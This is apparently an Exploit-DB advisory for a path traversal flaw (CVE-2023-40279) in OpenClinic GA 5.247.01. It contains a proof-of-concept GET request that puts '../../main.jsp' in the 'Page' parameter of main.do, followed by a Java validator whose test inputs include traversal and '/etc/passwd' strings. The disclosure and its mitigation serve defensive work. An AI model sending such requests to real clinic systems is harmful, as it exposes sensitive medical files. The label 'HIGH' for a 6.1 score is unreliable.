Vendor: OpenClinic
Author: V. B.
CVSS: 6.1 (HIGH)
CWE: CWE-22 (Path Traversal)
Product Name: OpenClinic
Affected Version From: 5.247.01
Affected Version To: 5.247.01
Patch Exists: NO
CVE: CVE-2023-40279
CPE: a:openclinic_project:openclinic:5.247.01
Metasploit: (none listed)
Other Scripts: (none listed)
Platforms Tested: Windows 10, Windows 11
Year: 2023

OpenClinic GA 5.247.01 – Path Traversal Vulnerability (Authenticated)

An authenticated path traversal vulnerability was found in OpenClinic GA version 5.247.01. By manipulating the 'Page' parameter in a GET request to 'main.do', an attacker can navigate to arbitrary directories and retrieve or execute files. This can lead to unauthorized access to sensitive information or facilitate more severe attacks.

Mitigation:

To mitigate this vulnerability, the 'Page' parameter should be validated so that it can only resolve to files inside the application's intended page directory; traversal sequences and absolute paths should be rejected before the value is used to locate a file. Additionally, access controls should be enforced to limit access to sensitive files and directories.
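As an added example (not OpenClinic's own code), the kind of check the mitigation describes: the 'Page' value is first matched against an allowlist of page names, then canonicalized and required to remain under the application's page directory. `PAGE_ROOT` is an assumed placeholder directory, and the test inputs include the traversal string from the advisory.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

/** Resolves a user-supplied page name against the application's page directory
 *  and rejects anything that would escape it. Illustrative code, not OpenClinic's. */
public final class PageParamValidator {

    // Hypothetical base directory under which the application's JSP pages live.
    private static final Path PAGE_ROOT = Paths.get("/opt/openclinic/webapps/openclinic/pages")
            .toAbsolutePath().normalize();

    // Allowlist: relative page names made of segments of letters, digits, '_' and '-',
    // separated by '/', ending in ".jsp". This excludes "..", leading slashes,
    // backslashes, null bytes and URL-encoded characters outright.
    private static final Pattern SAFE_PAGE =
            Pattern.compile("^[A-Za-z0-9_\\-]+(/[A-Za-z0-9_\\-]+)*\\.jsp$");

    /** Returns the resolved path if the page is acceptable, otherwise null. */
    public static Path resolvePage(String page) {
        if (page == null || !SAFE_PAGE.matcher(page).matches()) {
            return null;                           // syntactic allowlist failed
        }
        // Independent second check (defence in depth): after resolving and
        // normalizing, the result must still lie under PAGE_ROOT. Path.startsWith
        // compares whole path elements, so "/pages-old" is not mistaken for "/pages".
        Path resolved = PAGE_ROOT.resolve(page).normalize();
        if (!resolved.startsWith(PAGE_ROOT)) {
            return null;                           // would escape the page directory
        }
        return resolved;
    }

    public static void main(String[] args) {
        // Constructed inputs: one legitimate page name, then the advisory's traversal
        // string, an absolute path and a null-byte style suffix.
        String[] inputs = { "patient/overview.jsp", "../../main.jsp", "/etc/passwd", "a.jsp%00.txt" };
        for (String in : inputs) {
            Path p = resolvePage(in);
            System.out.println(in + " -> " + (p == null ? "REJECTED" : p));
        }
    }
}
```

Only the first input resolves; the other three are rejected by the allowlist before any file access is attempted, and the canonical-path check would stop a traversal even if the allowlist were later loosened.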

Exploit-DB raw data:

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)
Steps to Reproduce:

1. Crafting the Malicious GET Request:

- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0

2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.